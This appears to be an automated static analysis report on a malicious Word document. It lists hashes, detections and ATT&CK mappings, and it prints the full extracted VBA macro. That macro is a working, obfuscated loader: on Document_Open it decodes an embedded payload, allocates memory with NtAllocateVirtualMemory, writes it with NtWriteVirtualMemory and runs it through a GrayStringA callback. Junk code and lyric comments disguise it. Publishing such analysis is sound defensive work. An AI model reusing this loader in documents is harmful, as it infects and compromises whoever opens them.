Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9b925854b37b5f30…

MALICIOUS

Office (OLE)

175.0 KB Created: 2017-02-23 12:26:00 Authoring application: Microsoft Office Word First seen: 2017-03-15
MD5: 92cd7ee9d6f9a6009cde1f322d0f5cec SHA-1: 3f8e78f71aae28d633b2309ff21378cc47f7285f SHA-256: 9b925854b37b5f305327147e54198e44859c21dd57a8f4ac93b882d43fec01e7
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the presence of VBA macros indicate a malicious dropper. The Document_Open macro is a common technique for initiating malicious actions upon opening the document. Although the VBA script is heavily obfuscated, its structure suggests it attempts to download and execute a second-stage payload, likely leveraging the benign URLs for metadata rather than actual C2 communication.

Heuristics 4

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim phryne As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13507 bytes
SHA-256: 292a3081777ffb38ad4874b0aa08e70da58f8154da9255f9afebb325b3458a6f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub shindig()
Dim iodination As Byte
Dim collinsonia As String
broad = ThisDocument.ComputeStatistics(wdStatisticPages)
petrous.behaviorist.Value = broad + 9
vitiation = "ch" & "essm" & "an"
organizationally = "ac" & "cepted"
Set bathrobe = petrous.behaviorist.SelectedItem
footfault = 9
appliance = 25298
silvex = 187158
tetrasaccharide = NPer(75 / 678, footfault, -34342, silvex, 0)

caporal = bathrobe.Name
verdure = 5844
seagreen = Right(caporal, verdure)
porthole = slander.sapling(seagreen)
lolly = 3
shenanigan = 196
stercorariidae = 14329
patzer = 257898
patzer = SYD(patzer, stercorariidae, shenanigan, lolly)

vapor = "fr" & "ench" & "horn"
ashore = "departing"
#If Win64 Then
Dim ataxia As Variant
Dim annum As LongPtr
Dim vivify As LongPtr
Dim chimes As Variant
#Else
Dim planetstruck As Integer
Dim vivify As Long
Dim dolmas As Integer
Dim annum As Long
#End If
chiasmus = 0
blague = "luniform"
noli = 4096
gekkonidae = 5
barkantine = 216
indefective = 25683
wearer = 230264
wearer = SYD(wearer, indefective, barkantine, gekkonidae)

earthshaking = "ex" & "acti" & "on"
deprivation = "asia"
basidiomycete = "aer" & "ifict" & "ion"
important = "arescent"
amulet = 6
chirpiness = 352
hydrilla = 33193
discursory = 238962
discursory = SYD(discursory, hydrilla, chirpiness, amulet)

boniness = porthole
purgatorial = "carbuncled"
botanomancy = "outset"
annum = fingerspelling(boniness)
plethodontidae = "anapsid"
scatter = "bugbane"
#If Win64 Then
Dim akimbo As Variant
Dim dodge As LongPtr
avibus = "quartet"
embalm = "pensiveness"
Dim shamefulness As LongPtr
charabancs = 46 + 26 + 1240
#Else
involuntarily = "th" & "amnophilus"
capitular = "bearish"
exteriority = "omitted"
Dim dodge As Long
fellows = 12 + 483
Dim shamefulness As Long
charabancs = fellows + 2659

#End If
Dim causatives As String
Dim cerous As Long
dodge = 40 - 37 - 3
vivify = annum + charabancs
shamefulness = 22 - 29 + 112 - 104
tombe = adj(shamefulness, shamefulness, vivify, dodge, shamefulness, dodge, dodge, dodge, dodge)
adrenocortical = 98
infinity = 2721
dolmen = 318979
perfective = NPer(84 / 716, adrenocortical, -22874, dolmen, 0)

End Sub

Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub

Function hewers(adorned, abutilon, ammotragus)
#If Win64 Then
Dim euphemistically As Integer
Dim palinode As Integer
Dim calced As LongPtr
Dim benzoate As LongPtr
Dim cauterization As LongPtr
Dim autopilot As Integer
Dim acrefoot As LongPtr
Dim breakage As LongPtr
#Else
Dim benzoate As Long
Dim differentiation As Variant
Dim calced As Long
Dim sent As Integer
Dim acrefoot As Long
Dim compense As Long
Dim cauterization As Long
Dim stoneware As Integer
Dim breakage As Long
Dim meagerness As Byte
Dim carapace As Byte
#End If
wonderfully = wonderfully
nakedwood = Fix(51)
benzoate = adorned
breakage = ammotragus
wonderfully = "intransmutable"
acrefoot = abutilon
propoxyphene = 84
entete = 31605
uraninite = 229852
dryopteris = NPer(70 / 745, propoxyphene, -8766, uraninite, 1)

sm = asepsis + 469
calced = 30 + 102 - 16 - 117
nigroporus ByVal calced, benzoate, acrefoot, breakage, cauterization
sm = Fix(196)
End Function
Private Sub Document_Open()
Dim phryne As Integer
Dim forepart As Long
mature = "ela" & "stoplast"
canonized = "dev" & "eloped"
shindig
guet = 7
anatolian = 135
busybody = 45279
patronage = 586252
patronage = SYD(patronage, busybody, anatolian, guet)
End Sub
Function fingerspelling(kenya)
Dim bryopsida As Integer
Dim goddaughter As Byte
Dim famous As Byte
Dim adroitly As String
#If Win64 > 0 Then
Dim blandae As Integer
Dim astasia As LongPtr
redwood = 18 - 92 - 87 + 169
Dim clamshell As LongPtr
Dim betterment As Variant
Dim recognizable As Long
Dim protective As LongPtr
Dim corgi As Long
#Else
Dim supposed As Integer
Dim astasia As Long
redwood = 75 + 101 - 172
Dim clamshell As Long
Dim goner As String
Dim protective As Long
Dim tangelo As Integer
Dim myrmecophyte As String
#End If
seychelles = VarPtr(astasia)
sinkhole = hewers(seychelles, VarPtr(kenya) + 8, redwood)
achoerodus = -1
clamshell = 5 - 7 - 120 + 122
classical = 77 - 36 + 85 - 126
protective = 109 + 9345
blowtorch = 5 - 99 + 4190
gruntle = 64
dichroism = ararat(ByVal achoerodus, clamshell, ByVal classical, protective, ByVal blowtorch, ByVal gruntle)
choleric = fibula

sm = Rnd(436)

hewers clamshell, astasia, 128 + 4256
fibrocartilage = 3
powdery = 263
pie = 51249
capricorn = 109475
capricorn = SYD(capricorn, pie, powdery, fibrocartilage)

fingerspelling = clamshell
End Function

Attribute VB_Name = "slander"
'  Maybe if the stars align, maybe if our worlds collide
'  I miss you so much, I miss you so much
#If Win64 Then
'  He was a dreamer at heart
'
Public Declare PtrSafe Function boarder Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal excessive As LongPtr,attune As LongPtr,durmast As LongPtr,secretiveness As LongPtr,twoway As LongPtr) As Boolean
'  Chasing after danger, making my heart race, woah
'  He was a dreamer at heart
Public Declare PtrSafe Function arctiid Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (fancier As LongPtr, humid As Any,leucine As LongPtr, intercommunion As Any) As Boolean
'
'  Maybe on the dark side we can be together, be together
Public  Declare PtrSafe Function adj Lib "User32.dll" Alias "GrayStringA" ( ByVal adnate As Any, ByVal selfopinioned As Any, ByVal unwaxed As Any, ByVal needlework As Any, ByVal backstairs As Any, ByVal fore As Any, ByVal oast As Any, ByVal everything As Any, ByVal starry As Any) As Long
'  Baby I'm yours, baby I'm yours
'  Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function buchloe Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sarum As LongPtr)
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function dioxide Lib "Shell32.dll" Alias "SHGetSettings" (aye As LongPtr,dekaliter As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function agastache Lib "Shlwapi.dll" Alias "PathFileExists" (freelance As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function nigroporus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal sachet As Any, ByVal alstroemeriaceae As Any, ByVal chantey As Any, ByVal excretion As Any, ByVal amorphous As Any) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function ararat Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (dinnertime As LongPtr, myxomycota As LongPtr, ByVal angler As LongPtr,denaturedByVal As LongPtr, expensiveness As LongPtr, ByVal womanizer As LongPtr) As LongPtr
'  He was a dreamer at heart
'  I miss you so much, I miss you so much

'  He was a dreamer at heart
'  I miss you so much, I miss you so much
#Else
'  He was a dreamer at heart
'  I miss you so much, I miss you so much
Public Declare Function depletion Lib "Shlwapi.dll" Alias "PathFileExists" (tenet As Long) As Long
'
'  Maybe if the stars align, maybe if our worlds collide
Public Declare Function ararat Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mossy As Long, resolve As Long, ByVal glossary As Long, delinquentByVal As Long, chaffinch As Long, ByVal meditatively As Long) As Long
'
'
Public Declare Function nigroporus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal cobber As Any, ByVal airpipe As Any, ByVal beethoven As Any, ByVal bullfight As Any, ByVal loupe As Any) As Long
'
'  Maybe on the dark side we can be together, be together
Public Declare Function repicolous Lib "Shell32.dll" Alias "SHGetSettings" (acantholysis As Long, seapiece As Long) As Long
'
'  I miss you so much, I miss you so much
Public Declare Function clothed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (prandial As Long)
'
'
Public Declare Function nuphar Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (confoundedly As Long, chinks As Any, criminologist As Long, adduction As Any) As Boolean
'  I miss you so much, I miss you so much
'  Tell me, is this freedom, baby?
Public Declare Function indicated Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal byzantine As Long, sacrilegiousness As Long, astrantia As Long, manumission As Long, uprise As Long) As Boolean
'  Wings spread to the sun
'
Public Declare Function adj Lib "User32.dll" Alias "GrayStringA" (ByVal acidophil As Any, ByVal pachyrhizus As Any, ByVal viscaceae As Any, ByVal controversy As Any, ByVal argufy As Any, ByVal advantage As Any, ByVal philately As Any, ByVal doting As Any, ByVal piaster As Any) As Long
'  I miss you so much, I miss you so much
'  Love don't come easy at all

'  Chasing the stars, chasing the stars
'
#End If
'
'  Maybe if the stars align, maybe if our worlds collide
Function flared(secretariat)
flared = AscW(secretariat)
End Function
Sub wheresel()
    If Selection.Information(wdAtEndOfRowMarker) = True Then _
        Selection.MoveLeft Unit:=wdCharacter, Count:=1
End Sub

Function wuther(undeclared, altorilievo, arm)
Select Case arm
Case 39
wuther = undeclared \ altorilievo
Case 49
wuther = undeclared And altorilievo
Case 57
wuther = undeclared * altorilievo
End Select
End Function
Function sapling(amusing) As String
Dim novello() As Byte
Dim acidic As String
Dim indispose(63) As Long
Dim due As Long
Dim bowel(6965) As Byte
Dim unlaureled As String

Dim squareness(63) As Long
Dim fissibility As Byte

Dim autoplastic(63) As Long
fibula = choleric

Dim characteristic As Long
nakedwood = bruit - 270

Dim anergy As Long

Dim abhenry As Long
wonderfully = fibula

Dim touch As Byte

Dim flatware As Integer
Dim canonize As Long
christmas = 65280
pessimal = 7 + 4089
Dim gasconading As Integer

Dim articular As Long

Dim ovary As Integer

halocarpus = 73 + 114 - 70 + 257931
cite = 63
likes = 75 + 66 + 52 + 65343
bastardized = 85 + 16514987
rhincodon = 84 + 28 + 67 + 77
assiduously = 43 + 84 + 14 + 114
carboloy = 50 + 97 + 3885
scrambling = 70 + 60 + 262014
acidify = 16711680
pardon = 64
Dim legalism As Variant
garcinia = 101 + 108 - 128 - 81
extenuated = 5843
Dim facially() As Byte
Dim demoniac As Variant
facially = VBA.Strings.StrConv(amusing, vbFromUnicode)
Dim acervation As Integer
budorcas = 2
nem = 223
ammoniac = 11441
cheliferous = 553797
cheliferous = SYD(cheliferous, ammoniac, nem, budorcas)

puppyism = 5843
northernmost = Sqr(RGB(0, 1, 0))
For prismoid = 0 To puppyism
If prismoid Mod 2 = 0 Then
facially(prismoid) = facially(prismoid) + northernmost
Else
facially(prismoid) = facially(prismoid) + northernmost - 1
End If
Next prismoid
disseize = 8
newly = 341
esocidae = 12389
mutter = 521936
mutter = SYD(mutter, esocidae, newly, disseize)

flatware = 0
goldbricking = 84 - 84
motheaten = 43
subclass = cyst
For abhenry = 0 To 63
indispose(abhenry) = wuther(abhenry, pardon, 57)
squareness(abhenry) = wuther(abhenry, pessimal, 57)
autoplastic(abhenry) = wuther(abhenry, scrambling, 57)
Next abhenry
imitated = 65
continuing = 14966
dorser = 387811
abbreviate = NPer(79 / 589, imitated, -20064, dorser, 1)

novello = facially
diffuse = 4
bodybuilding = 6
apios = 357
leafed = 16129
reagan = 305994
reagan = SYD(reagan, leafed, apios, bodybuilding)

callinectes = 3
nakedwood = Fix(323)

fibula = "monument"

outspread = callinectes + 1
extenuate = 109 - 107
For characteristic = 0 To puppyism
geotic = novello(characteristic)
counterinsurgency = novello(characteristic + 2)
due = autoplastic(subclass(geotic)) _
 + squareness(subclass(novello(characteristic + 1))) + indispose(subclass(counterinsurgency)) + subclass(novello(characteristic + callinectes))
abhenry = wuther(due, acidify, 49)
bowel(canonize) = wuther(abhenry, likes, 39)
abhenry = wuther(due, christmas, 49)
bowel(canonize + 1) = wuther(abhenry, rhincodon, 39)
bowel(canonize + extenuate) = wuther(due, assiduously, 49)
canonize = canonize + extenuate + 1
characteristic = characteristic + 3
Next
sapling = bowel
End Function

Function cyst()
Dim mixtura(255) As Byte
chelydra = 65
Do
mixtura(chelydra) = chelydra - 65
chelydra = chelydra + 1
Loop Until chelydra = 91
chelydra = 48
Do
mixtura(chelydra) = chelydra + 4
chelydra = chelydra + 1
Loop Until chelydra = 58
chelydra = 97
Do
mixtura(chelydra) = chelydra - 71
chelydra = chelydra + 1
Loop Until chelydra = 123
mixtura(47) = 63
chelydra = 43
mixtura(chelydra) = 62
cyst = mixtura
End Function


Attribute VB_Name = "petrous"
Attribute VB_Base = "0{251FA6CC-669C-4E05-A4E9-53108C24B81C}{1165EBC0-DA34-44E4-BFA6-C474BC3D9584}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False